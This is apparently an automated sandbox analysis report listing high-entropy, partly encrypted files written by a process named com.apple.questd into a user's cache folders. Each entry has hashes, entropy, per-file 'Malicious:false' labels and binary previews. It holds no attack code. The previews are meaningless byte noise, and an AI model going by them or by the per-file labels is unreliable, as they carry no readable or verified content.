                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..VSzs...@2A...GY....0..[M.$8`I.n.U.....s....%j[..}.....~k.......6.....3(Q...=R...VB.sS..kP..%..pe...I...u....-..q.:....1..KkT.._.-.`R.......W>...#3...x..x _K'N..h)..""..~?.a.?'............u4......RB....+....}t......D&%....o.5.(...&a?zR$.p...g.b...Y......a.......>.e.r7......k"...$.]...,..- .C..r..z.T..... ..b\.'.^...d.....I$..^>.-.-T.5D>,......l..>z^S?b@..nP...P4....{.v..IF.h..Jo.6"..1<.......3.......*v.(w/....nb..s.d.#<.v1..U.%~X.....>.....p.......;...}..Xn'...Z.@..n....8.^)...L.....'t....>...........t.L..[.....|.......>q.......s.-.1..@8=.....#..-M.g1.+r.^$.....}.q....N......$.6.....34.].........Z.p..|o..1j...;.O..P...>.........?.a.<]."R..O1Y8...2....O.H.......\.'I........^...._H....Q...-.JQ.5r........n.........?.......`.e. ....f.,.....K".R......Ua)..8.,...6w*...Q...i......b....!5.n.".....I)...e.=W..............y!....'1....V..vl.!.|.}W....J.A38..1'..S.M.>x?d.b..6..(G.....W>.......8...4....Q....A...=:N.4N.....A..Lf..P..K.yO.$.7.a(..;Ud.......3:+.....6O.......".2......N..p.xL......F[{.>
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.74458D3C-D0E0-4DC6-94E1-0B10280EEB2C.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):14970
                                                                                                    Entropy (8bit):7.974649414111595
                                                                                                    Encrypted:false
                                                                                                    MD5:2D701B04D7B17AABFE849331BBC6C182
                                                                                                    SHA1:09EDADA9AF4DCE32714192CD30407DE5CFCAEAF9
                                                                                                    SHA-256:BF56B8F2C5E2D370E228B4299A82E820C184BAB201096E1FDDD863738F98CF0B
                                                                                                    SHA-512:4FC35823785BD92DBFA75FE39C72A55244D8661D1CACC7EBDA65E9EA17517869D58DD4D2722B287ECE0A4A407354DDDEAC5D6AD3D0D1FCC2DB02D26B8349B96E
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: 1...#{"..%...=;....15.G...[.C....a.X.(6...N.f....P...&.....B*}..U.....??|...i.....U...E.kr..t.B.L..$.%.;.9.\.T.<[...b......_upr~..._...O..r.2.E...........N....e.i..}].p.6P...F.'.....7....}Df........g4\$.on6GxWq........mX...%6Z.5..%...nC..$.. ..b....7...*....@ .L.#...=t a..?h>M...:...^.y.3BL:..tR..K...u4..!4..8.\...@..e..7...:.rEF....'OW.......>%...b..([.............us.}..f.#E.}!..................#to.=.....<..=h.......G.Qi.H...E.(F....]...0.b(2...{..(..dW.....Pe..z.P.....<~q..K..t...?!c.A.Z...$GB.......K..Z.........>0Amcu....*s.:........i&....d.i..^d....^..nS.q,.BlyT9.;...w2.G.....w.\.......fyi......t.`O...Et.'..dV|J....t..43+.&..c...,....,U.....T...)w^.Vi..%..!...2.1..P~.....)^.@+<....&...."c;:....9r.@...$.D8..[.3.. :.._.;l:.lR#.....B.mxW..yaW+....-......._TF.j........r).`..,Y..5..b>.;GX.._\JR...4}.F..S.s...........Z.F.c.ZEd..X...{T.....Ys.0....t...P.........lW3*56..\m.......WvU..I..M:..a.UZ ........)q...o.zyE..Q.....d..w....."t+Y.7.GJ...L|.6.E..<......74wR...2+...-...._..7....."......
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.76D0A4AF-D762-476C-A65A-4AD7BF23AB54.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:DOS executable (COM)
                                                                                                    Size (bytes):21563
                                                                                                    Entropy (8bit):7.984072057331293
                                                                                                    Encrypted:false
                                                                                                    MD5:AF8E0D3A2FC1694384B671322BD053FD
                                                                                                    SHA1:38A954F87EF6773F89B4B82C66AA0930D8B30FCC
                                                                                                    SHA-256:D54A1F91511895A54E70A4B6874D0FACE4172633149D0A6B1FDB65128EFDCF77
                                                                                                    SHA-512:110BD1C77CF41D2200035FCA04E528D0A81273D23304FA6FF1F30E4835763E30D4A5E38CAE700365555F6B98007EE986B350EB8A48AB3C5E6B8E75F1ADAFF52E
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .......\.m./....Pp..!$$C.v..d.fY...Y...........!A........-i~...^T0cz.af......xF.a..Yvle...j.7.|....U........[...fBW..~b'.|..i..y*..!Z.N....5...a.Y...@8...z..*....yh)/..+.u.(.u....}...r.....f..FR....j...$.|....8..VCou.y......l*>to./..8P......b....l=....e!.."....,.g/.z.2.....v...*.Z...v........y..........zerG.x..'.Hn.%.;Ht;......].s.N...9f>....O"........H.(}.....H.u....E..........?.R2..a.iB...<.z..Q.@.s5.,...l6:;....}.3,A...uq.lF.....h.;.$.T.~....#zu..lJ1W...u...|.<...5...t$...R...(D..xe5.r........+.v.Q-...7.....t....R.}O.....`t...Bd..b...l)..s......~.6....J.....)...-.}...].+m<..9..+.0B.....h".B.........2...%......6L..r)X.. .q&.0.x.M0>....s................E../.."..W...n.i..N.U...qX*..-s.Q..,...~.....td....~.2...$..';}SQV..h..O@..xA.._.5.4.=...aN..+V..c.Zo[...y..s5.i............%.Z.........W......9....;..%...6.6QW.d.DJa....<g...&}..00.K...Q.8...{...~...q....h._.8mdZH...Mlh'(-.`Yd....]..?.@D-......... f...B.{.N.....P+\s..|..BUB..0d_.X.m.f>.....E../'W...;.}K.r....x...\...r.................A
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.798BF8D4-4DFF-4A44-8449-660CC6C56141.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):70382
                                                                                                    Entropy (8bit):7.970445795218374
                                                                                                    Encrypted:false
                                                                                                    MD5:CE5D8B968CBD3891C3FD4ED9DC6D669A
                                                                                                    SHA1:77AB202B1A267FB2BA1FE25000B9605F14F54F2F
                                                                                                    SHA-256:8A8617A60C815807176C4FAC6FC976DA329D87CEA89A94F7E134CDC72C35FF9F
                                                                                                    SHA-512:54F437F6B55F47B5FB92B8D25334850E35EDF94AE120AD718EBF6F4BA83D0D2EEE33574274C5C62D7397400434EBA6C2510F2B5AF4A0939DE92F118C10D2DB5C
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..VSzs...@2A...GY....0....J_.>.2g.p-....NT..g.E......Z...C9..2...6.....3(Q...=R...>..}.dRLi.).....6.wc...v.$...#Ee?g....C.G..?p.]{[K.N.g......q$.t......r......+.N8...J..s-.q|...A.I........T...;....e(...Q.-..|a.U\\t...i.T/eF).....k.36 \....%.....~..)...fbR..5.........f...g.....$.........aG#.n..?...~.n...D..][.p3Q.....$..}..E.1........qq...D7...8..x'E!..&G.h.G..`.e. ....f.,.....K".R......Ua)..8.,...6w*...Q...i......b....!5~..q...f......mcsTo..._Q..........8.{....Ko..?...e(r..g..I(...w....<mV].T.....|1.6...D...Y....B...w-..>Ui.!.j.)v.)...0...]...NjcY.\xR.J-I....ef....{A..':R...m)..#...tf..m...l...1.....l....Z.p..|o..1j..2R..)...($bG*...q.]..D.k..f..`Y.r...u:@.W{....g~.e.3..o........{x"...5G.xD.}...A..ZH...D........x!.{.pC.T....F..........,..{+.G...a.i...3..q.!.....%..{...<.u...bv...h.....KX.i.=.Zf}C..O.F5.a.6..n...+}=...... 8GR.f...3..q.!.0....1>.1.?z^..B.)?/1.........=4S...Y..<1..m......r...j.. ..d@.k......V....R...(B.-...>1.....7d..se...n.....1...U.4mj..w...).BR..z.h...)0....!...f.eYg.<
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.7CF147E8-6885-4EC9-A24A-43220D8E5D68.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):836733
                                                                                                    Entropy (8bit):7.999744782274388
                                                                                                    Encrypted:true
                                                                                                    MD5:20114CC716627C2FB834330A1FD68246
                                                                                                    SHA1:7FEBBC6D1A0694F00A892D29BA0C3EA03A990792
                                                                                                    SHA-256:FE05D8A2669FD6CB46046A86592AB22A5C78E612BB7E17FB3F2A48203992BF54
                                                                                                    SHA-512:7B53E22544DB520AFA5043CCB12BD58B338A8C78B2E1A0DD31474222C15F7432C6AF90BA98D9F0FF57DD37CA6519C34641B3C4A277B82B93801E4DA76E56F768
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ...K.a2..c......\}..lq...!.....u.z..c .4.....W. ...s..[.P.'.W......).&.W%j.......Z.........e............[3...k..I...}sH.VX..g.h{ U;6SjJ....Pg5..i.a..U:...dQa2A ..=k.p..u)...h.......... ..#.j^v.!.Q..rf{h....B..6.........Gugv.......a...Z.~..}y.v...O.1f@.m.<.?BO.....K......e<..........x..|m..............X...E.8.............1F_2td....Wl...BOW..{a.l...C..K$.].4........s...B..c+.t(d.h1l....x%.VP.$..A..q.=.[.. ....oA.....ae/L..J.e.a....m.~...km+d.W5yI..<..,.Y{....:U....C.y...Q.....v....<..C.D...C.W./*.......R....i.V.{-+... .z....^l............{.\.e..w5...z..<...@fu..~.N.......fP10......y..,%.V..l.`....._N.......u.f..St.QmR1...P..4.w.d.,..s..[.O.F......u<.;xx../.....U..<."....qn...a.X....O..W.f....{.X.?./.....%X5...`3...!.s.X}D..$.WZ]k.4...Q.+.5`S.t.t.....((.S= .eR.....}..<.u.us^.D.~...z.l..."xc.?ZJu.n..^#H...f,.g*..`......M}....pA-...Md...H.....dT0...HP...M..=.W%....;6......(*M..y..!..3/..DF~.B(8....&.m../.r,......L..j....s......f...D.;'I...V...R._.......!,...b.A.Dp....x....../....N.>Ja1;.?..
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.7FD4DD02-29E8-4746-A485-ABF60F1E3604.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):15306
                                                                                                    Entropy (8bit):7.96065057887298
                                                                                                    Encrypted:false
                                                                                                    MD5:BC7DC9A301F12BADBC026D53C1381900
                                                                                                    SHA1:9B019C780CCF22F4CEE24E82DC496C06CBCEA6D8
                                                                                                    SHA-256:841DFCC7A444E1868BABFEB081716DD85BE16CDEED7F9D182E03E9FE58154022
                                                                                                    SHA-512:F4F2305C1815569122D8FD216E396BB253AAFA7932802AC043B41677D9D10D732E4246C5C3B9FC73E8042AF46CC3EFD8E54C5497167F96E4D4BE87D1657E1748
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..VSzs...@2A...GY....0....."&..|...*..$......{aX..@bn..~R..0.....6.....3(Q...=R.xh`..&..o.5..G.....Y....m.I.0.....8.f.JE.!P..n..*.....R.l6.....7@e...l.K..1*.9$<..<:...........r.....x...........~L:P.........|.....p.2....gF....L..]n...;.NK...%>..e..8|.d.F.w.?.Lc...N..W....d..."c.07..v(...w.H..GG.{9.7J.i(j....I.n.f.....*.._..Z.tyf.B...~%....E.:s.q.:.....0B......O...[......A..(...$.&..s.(O..Cb.y[M2i..^>.-.-T..p..nf5WW.....M.w8..{....>..0!.j..]>......1.......V.Z.*..u.F...F..m^..,3..Xy.S.<.A3._.._.bU.R.9..c.........V...&..6..$.......OJD.......sN.L...X.J7.nf#9..-M.g1.+.np....M..S...z........+.5j..U~.U....f,.C.G..?p..o._...o..LZ..2....1....g..~.6/lD..y..a....:...^.r...u:@.W{....g ..T.......k.y..8..Gr.^.....K..J.....4....im?..(.T....F....K.48..Q....*}D7.v...1..=...0...l..jlm|,.$.@~...)..A;.f....._s..L.<..?.7./....7.(W.[...#.>E.oY......&d.o...Y..x8y....#.....x.....X...k.....u4.yK^..=.....|...i..)..7j.oX.x][.....y(......9E}U!. <-.........4...\1...o....m..L....a..,.*\...$7`...0}o.........C....O.8.
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.82471A98-AD6A-4875-89D8-7ABEB73BEA6A.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):23515
                                                                                                    Entropy (8bit):7.961212223168292
                                                                                                    Encrypted:false
                                                                                                    MD5:41477B4CD5F658C750BA4DA11B9EBF8A
                                                                                                    SHA1:1E4191F73E1F5A245CECE875EF6F400D08690AF5
                                                                                                    SHA-256:E8EF5D3E5DED2A7CA304740220555E093AE78677D3B9ACF54BEB01EFF44668B2
                                                                                                    SHA-512:884D502CED7D3462A18B58C3C017DBB99B8E7AD57F116626BEBAC96940BC0F22C843AD6F3127EA900627B7017FF31E2953D8BEEEAF84EE36997CE9A611A44079
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..VSzs...@2A...GY....0..N.{..T..MF...Wg.*B..c.JST.QYb......V.y...6.....3(Q...=R.V...[f..k.w*.ua....Y....m.I.0.....8.f.JE.!P..n....'..R.%l6.....7@e...l.K..1*.9$<..<:...........r.....x...........~L:P...Jg.I.dW*[..1..."}7.J.RT..Qw).]]A@K..s.......H]...i#...........F...e.E........E..X.?..BG..~3.Ij..9.7J.i(j....I.n..yf)......^.......c+..^.....E.:s.q.:....~.$0S...[!..~.......A..(...$.&..s.(O..Cb.y[M2i..^>.-.-T..p..nf5WW.....M.w8..{...wi8H.j.i......z0....kl....V.Z.*..u.F...F..m^..,3..Xy.S.<.A3._.._....X.:..c.......D*.~..h..V.Jn.l$........np....M..&y.niT....Gj...xJ...#6..~;......yF..a...Z.}*.1w...+..*.q.:....1..KkT...........O.......!..E.$&F.w.....?.p..7..q7....p.....:..l.....F.....#....s.*.[=..eH...$.K..yF..a.\-..Q>^...*.........A..(...$.&..s.(O..Cb.y[M2i..^>.-.-T..p..nf5WW.....M.w8..{...wi8H.j.i......z0...e...>....;.i.....X..j............`.jy.D..kD.-.%V...P,h.!.......e.T.....7@3f.x|eh........w.....O..L.n....:q...F.,...I.....|...i...B.nE.E\...:..kUl.}.X....Q.....w<......R............^.t......
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.8506B47B-27B4-4786-9978-C03C0A0AFCCE.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):22851
                                                                                                    Entropy (8bit):7.986953316158936
                                                                                                    Encrypted:false
                                                                                                    MD5:7632DCB599398F270E4F98C086EF167A
                                                                                                    SHA1:3AFBCF5601DAFA0A256AF5DA69F7CF023BED8180
                                                                                                    SHA-256:29A661432E51878834EE3EDE708BEBC47AA7CC668CAD60FA3BA17885AB35344C
                                                                                                    SHA-512:4F0070834A8B5A3C61AB3D3DE487672904596CE49C9149D1AF6294A8604C43B410AFEDE980D0B2FD256392AC2CDC9FF1D4E48FE6918BD045E4A7B9CF9C2C0024
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: p.p;.......B,...S.....s.T1.*2.Jt.b.w.=4....S:f].1...H...........t..}DoYA..~....d.8...t.g.....b.X."..(..._ *..8....|#D.2j...[.d.X.Bs.(.v....X..X............g.....h>RP...a..g...6......8[.?r.w<D..+w....`..P&... ..0D....X.......X...H.uw...D.....aO"......E.<S..J]...a.:..'.J9.G..{.U..X.....r.w.JV..L...}.K-U...z..."j...K...l....V.}K.B..F.a.)..[F..O.0..4.BW....:........dW.O....r.x..||E..9...g<...`......=......i.m.k?A;B.Xs'"...'........]..`..iV.,..%5.u..X#...4nk.H.'Y4.....O..a..j........^G..9y.....c..-%.....-}..`I..,L.0...c.7ME-.8.t.D.p`o.F.S.6Y....?.V......W...,$..H..[......!...b..S......<..}.....Z.CH...O.B,......Ml.!....?......n..e...N..&`.\.*..9.M.._........,.e8.uHa9...KM..G...l.Y..Zus.ml.)...$gn...j.f.>z...B|....C.F!C.u.:...D.V.VD..........PR......"k+..{F.......B$..W..". ....=].h....3w.Z.Id.X.Y+.I......-..g.:..#AKpT...m.u...M.7.Y...+.......!u..1i.....p..c.,..&.%..3.7.{.....5...I@..Y...b....Ic.qR..s7.......f... .i....VA..&;.?1~. ..3oK.u..._4......!..a9...O.Z..`.e:[sQ&.+..3t.}W..e.>....$.z.Iy
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.89D2DCA4-4F16-4F9D-95E5-1B48D62D883F.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):7706
                                                                                                    Entropy (8bit):7.928526787211343
                                                                                                    Encrypted:false
                                                                                                    MD5:25A2B62816DC4E869174E848B244DD20
                                                                                                    SHA1:A9D612A1163DAED622480B26B32C67F4C550E270
                                                                                                    SHA-256:6D627B9A29C56AB14B3F525300C9647DD41AA841D6DFF9EA0A3C963693363DEA
                                                                                                    SHA-512:ABA4396FEC1F7C159937CB93F0E1DD67B80899E0421FACA93E74821E259CF6BDE9CC5E542B56EE63385C4CD98EF2926B13AC7EA77B7EE1287240550E702CF95B
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..VSzs...@2A...GY....0.......7..D....TB...-.d.l..>........g.q..-.6.....3(Q...=R.HB.]E..G..yKt..... ..._...ii..NH..W..z>...&....._>.-.x..l6.....7@e...l.K..1*.9$<..<:...........r.....x...........~L:P.........|.p.@.v....$.5..s.s.4X../. .i..Z8......R...[.0.7.Q6.r...*........aQ...$..}.........it;sR<.9.7J.i(j....I.n..A;8x...B\.....6.....=......E.:s.q.:....9...].{...3..ER[1.?z^..B.)?/1.........=4S...Y..<1..m......r...j.. ..d@.k......V. sQ.6[.c.`h.U.&l7.Ew..o.......A...Z..Qx;>B.....L....7t..5Y...Dx..O...=..|u<..3....R..ei..[..9]....-9,C.@...$G...m.......}...G.....}....l9.})0...'w.M.WQ...#.M..~..w...f..>.]..t..q.:....1..KkT.._.-.`R......C&..!.....3....@.E..u.C.?...d.t.R...{.h..s5<Y.E...|U..[H..........y..f.`..4`.....-...b...r.Z...+?.ZCV...q4;!..^\...iA.:owQ.H.._........\...>.Q.?<..l>......uRA9..si.AW.}*jo...a>~...1.rA....[.pmT.....^L.D@.^>.-.-T.I.:%..9mb1..52...X?p.:......."X5+.L..+......zg.R....A..!D...,O."..0......{.....+Z.[....kG..).&..}O.V..g*....Xft7..#".%.\....2..`.h......Z.......*...t...
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.8A45F420-2761-40EF-A7D1-B7296B66C1AA.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):9202
                                                                                                    Entropy (8bit):7.940347126512251
                                                                                                    Encrypted:false
                                                                                                    MD5:D4B72C9B3DBC564BEDA2C9FA8F6F4618
                                                                                                    SHA1:A354B775C96248D1AEF8E4B0311FD86B44ACA947
                                                                                                    SHA-256:628AA83DBEF137D687750538D2C5AB6C1FD1353D0E2AFD6581D45FDA6758BB3D
                                                                                                    SHA-512:82F6D6F519467BAB7BD483B79EB05135B6D676626517C70F32A996CAE68D6D50F24B15C9164F7A757D601A19CBC31C8DD22B6DCE87B22D787FF74DAECC8DB36F
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..VSzs...@2A...GY....0.....-..J..f.1k..q$Z.L1h|M..YS3*.0...%.....6.....3(Q...=R...D.>N."....It.F.. ..._...ii..NH..W..z>...&.......%.p=./l6.....7@e...l.K..1*.9$<..<:...........r.....x...........~L:P...Jg.I.dW*."+j...'.S.P...1KDr...\%L......Yd............(....mo....m....._.l..[.....kjO..Q.<.C..@{.9.7J.i(j....I.n.#b|......".GJ.B....B..AY..q..H...q.:.....'3.rg...#......1.?z^..B.)?/1.........=4S...Y..<1..m......r...j.. ..d@.k......V.....@.].E...Yyn...z^.4.....6d.....Z..Qx;>B.....L....7t..5Y...Dx..f._....$.....TG.Q...\...N[..<J....\th.4.......s..7....v.<.......-M.g1.+.R...`.!&Sy._.7....~M.\..m...l...1.....l....Z.p..|o..1j.z}...O...e.W.F..4..,...f.P*3x.J.-=.Cj.....F..-,B.r...u:@.W{....g......k@... .J..2y..>?.......l...................2w...z...#...Vh1.?z^..B.)?/1.........=4S...Y..<1..m......r...j.. ..d@.k......V.....@.].E...Yyn...z^.4...8=u./....l.j..<<..g5...G0.|..C..t.|....N.~...8...on"...'0cx.DM...C...w.~..-.q..6............l.xIh,.....l.......T.>.......c.-Og......i..Z..........4X....kUl.}.X
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.8B0A0519-3E0D-492C-9625-09AA8F01B9E0.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):20771
                                                                                                    Entropy (8bit):7.983578288945365
                                                                                                    Encrypted:false
                                                                                                    MD5:1153EB8AC72ECC74520C19B8B273879C
                                                                                                    SHA1:40DDFF221398B6E720F5EB9BB9C66E677D1A6E0E
                                                                                                    SHA-256:EC8FA1A1299D9C60CD2851E0790F14689888F334C3B225A9E84A5E7FFFF024C1
                                                                                                    SHA-512:8D459F70A4D3E5310F341BE0C6764D4EE6ED82C34B7B1403ABF2DAE2266F88FF1FE4774B2AA40E6768C9FC6FDDC6E6AA9FDF2804C3D9E48FA82B204CCDE2BD4C
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: "..."..\t.9.....p....l....%.]y..76........5....f..Z..!..e...3...../.o..y....t........?=...........b...].O.....h4,..5-E...I........p.n..(.....[23.....,..1...dj..4?.....A../.....B.......TbTf...OM..*.s.......HZ_.T!..w.....Do...N.K........K./jE....r1$.8.%~aq.P.|q. ..+.X..,*.#.n.....C5..8.....~..}...y..p*......M}+}._....;v.......P.5K.7...Pn...u\....B.....U..Z...........O...Yw&1.-N.&...C6..O....nTzo..._.q}.~@.........8..D^.....Z..W....$.f...$....)...........aL".K..*.[6j;.....$A..l3........=........Wm..H.m.Q. 3.7w..U.hYc_n8u.I<.)...c..y:cZl.n0G...g......5_.L..%....:.....H3...v..s.C;h.....0.9.?>.#.*a.......5.ktH7....rB...n..6<.R..B.;..f".... ..ZD.T.6.4....I_A-. .....(..d\.7.(.......q..............N.,P.@......o"..x...g......O..~..o..2...K.......0...S...1e.P...:...".c(....R..A.i.<.).o&.i.a.......v....O......\.)......dr]..1.~...n.6x....$m.Z2..I.Y...e.:.....l..q...,..74...^t.s.0......o.....A..[....b..k?..._$/..%.x.m.,..%.h...qs*..^..2#.>Q...%'Ub......m.se..v..v.Y....|..... /..i..........f....t9Q(.
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.8E9DC67C-B867-4DC0-827E-D0C5E4BBFF82.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):6922
                                                                                                    Entropy (8bit):7.9235657846138015
                                                                                                    Encrypted:false
                                                                                                    MD5:16BB6D2CEE24B151AB9551D3F2827D2A
                                                                                                    SHA1:93C679066742DC5062DEEE185337ECDA8E99DEE6
                                                                                                    SHA-256:40C7BBEA3E2E2F25DF65AA1AA492C47C3557A0A5ADB7D27E59C752BBC97EB258
                                                                                                    SHA-512:8F80A0B713AE926543CF54D99F85B62317DB51637732C502F403B09EF1A4DBF93394ECD0B29D369858930CCC0952A27715367B561B571DE741366304104692C9
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..VSzs...@2A...GY....0..TA.2...mn%......L..&.#C`.3...P....R......6.....3(Q...=R..^_.;Z.......|.X..Np....[..^b...,...r]h.hfL.gn.....`..........b..;.`nY..b.Z.bn.g...Pv2...mP..k.Q4c....(..<i.>H_.....zg.R.(|......S5..]t#*..0@..............p.t.......\..t&.9.aIec9..o:..........j.r.(R.. ...&|oh,../.h........F...5..B.#.TA.B..*"..u@....sz.0..e......Hs.....Z..k".DR..$&6@H..N.pt......1.?z^..B.)?/1.........=4S...Y..<1..m......r...j.. ..d@.k......V..m.cf5.a.]..j.-....)..........A...Z..Qx;>B.....L....7t..5Y...Dx..f._.....>.}.A...th......N[..<J...5..:.!.......s..{h..n.H......p.-M.g1.+.np....Mo...)..'|....;KP.6.....3.1.....l....Z.p..|o..1j...A.b...s..(..;+.)....D.....,.....A...g.Hx.......).x.<......Y..o..R.o^g...{h..n.K.&O....SFx!..rhNk$...7.N.#s.7].4.......ILp.......;=....4.......r.k.e...<....~.d.A..........A..(...$.&..s.(O..Cb.y[M2i..^>.-.-T..p..nf5W..r..+..w8..{...wi8H.j.i.0/Cm...;..H........;.i.....X..j............`.jy....04.j.%V...P,h.!.......e.T.....7@3f.x|eh..........e...0n*.......9E}U!&5..B...
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.94C21792-0BEE-4849-9C00-10FC483121EA.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):13682
                                                                                                    Entropy (8bit):7.957290432371958
                                                                                                    Encrypted:false
                                                                                                    MD5:12E5315050CCCF9528BF0512BED07C2E
                                                                                                    SHA1:75DC028B51CB4E7515F8855197B53A2DB7502455
                                                                                                    SHA-256:92607E6CDF69F295282942F0C911EC78148D9B09570785CFCDC1D745D9111619
                                                                                                    SHA-512:52FB2BA844DD96F0FDE3B6CC866E83A21A1B194EE2A5CA41E5A9882BB549E7A5EB7F22393EC78E450383C65447AC67D27BD3382C5915687933CEF4CEABC4F810
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..VSzs...@2A...GY....0...BL..u|...I......._.......E..h%I......n..6.....3(Q...=R.erZ.F..w...:n...[..^b...,...r]h.hfL.gn.....`....5.5NY~...;.`nY..b.Z.bn.g...Pv2...mP..k.Q4c....(..<i.>H_.....zg.R.(|.....3...m./[.....R........TY..."..{..............Mo8.N...uD.w...d.m.>.$....,.........8i...w.....Dy.N..5..B.#Hp..AfS.................fz.2..H......(..~.C[c../.?...i..1.?z^..B.)?/1.........=4S...Y..<1..m......r...j.. ..d@.k......V. sQ.6[.c.0f.:[0...n/..........A...Z..Qx;>B.....L....7t..5Y...Dx..O...=..|u<..3....R..ei..[..9]....-9,C.@...$G......#....._Dn=q.a..}....l9.})0....zZ.iU.U...s..o...Z.}*.1w...+..*.q.:....1..KkT..E....:......C&.._.......m.e...kwq7....p....t...p............../,FO...... 9..L.....>h..|.Z..UG.o..T....F....K.48..Q....*}D7.v...1..=...0...l..jlm|,.$.@~...)..A;.f....._s0.s.5/'.tY....0h...C...d.#.>E.oY......&d.o...Y...z=.+........x...i%.B}1......u4.yK^..=.....|...i..)..7j.%kl..&..f..b......q.EbDv.G.u.5.............J..K....;..I...... )........}1!..........i...LA.#..3.......M.O22'.jZ.
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.9BFC5D11-C309-4238-BB29-EFFB6CDC7CD9.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):16875
                                                                                                    Entropy (8bit):7.97998454059674
                                                                                                    Encrypted:false
                                                                                                    MD5:FBDAD2E22C8E53EBF41E634D0F252571
                                                                                                    SHA1:898BA9097843C16507DA5036CBBC91D96C43D2D1
                                                                                                    SHA-256:E98BC441C4864A3A7FFBDACDC8C7BFAF320D9DFF0B803556BBE44BC157018958
                                                                                                    SHA-512:995ACCF22A2AFE577F1EF936E67591E814C3A152537DA95DFF094AD6A2EBF0CFC23D582536F9FB2CF576CEF07FB1CEACDCB804E94CF25BFA324A900A6A09779D
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ....................t..& ....k...b.w.=4.X<..+........#..u?.HR=I.o"v:...1..]#.T....*.....NzSI.....%.X@.<..6..m..P&|v.^@+.4#...!H.0...Tk..Y%7........@f.b...X....Q...<....9W....|^..........<.....p.Q.U.}...XX?2...bi......V.@....#.G.EB...>]L..S.o.0F'...$M.4..Y.i.tC....T..t|..Bh.....mOG0\....|....*.p.H.`...l.X...{.....US..5.J..w.-.!.3....(.".V._...=.T...o8f..,..h.0.`.`..J.P.S%&RaZ.#y.=j...H.Y.....R.:.l..Lm.....<....|.U.Q!.}.S..f...j...m...2......0Oj|.k..Zo....J...r.-#o..a.C..f.X....5...{HLt.3j_.FWz*..Q"grs..k....-..I.B..p.?..rn.u..$.<3.......!...$...2p.C...#...Kd......c...?..}l#.m..."....`n@SL..d.:.....\..a+.....[...bMI.#..p.&3pC;...af..)..V.9.<..r..i.c,....]Y.T....:...O3t...L.+.....a...Dj........X.i&.L.t_'.*.....F.f..........{ K.9'.....A.......(.@....MF.{i...5......Dku.......S.g.kiL...h.xn....:.....#..K...{........4.l=<^....i.....l.[9..........e"...........G7....?.X..4:.....|..DHV F.m.G.ii..9W...<..1X.......k.....<......W....S..l.!s.Q_..G._......n`.....R-.\...#.$..~_.}I..l.yz....D.oG'(...D.
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.9E4F6ED2-9A62-4DFC-A453-CD23F4C49A57.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):82078
                                                                                                    Entropy (8bit):7.99753266560108
                                                                                                    Encrypted:true
                                                                                                    MD5:6D9F4A7A0113B6BA931BBA3AFBFE19CC
                                                                                                    SHA1:6C466697BD829639F073F97DBCFA926AB38DB57D
                                                                                                    SHA-256:E36CBBC31DB9369F7B2DABDA9BBAB547EFBA0C07779F319845454362654F37AC
                                                                                                    SHA-512:0DE6F21160BEB9BCDAD7763E5923F8108300378C0256EA42B1585287674E2B2712618C810E1D566BE1E6F55688C81DB23A28A75371FCCDA0B85525451057301B
                                                                                                    Malicious:false
                                                                                                    Reputation:low
